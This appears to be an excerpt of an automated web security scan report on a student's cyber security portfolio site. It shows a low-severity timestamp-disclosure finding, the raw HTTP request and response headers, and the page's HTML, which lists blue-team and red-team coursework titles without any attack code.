          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          257747436
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        9. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          350400823, which evaluates to: 1981-02-07 14:33:43

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
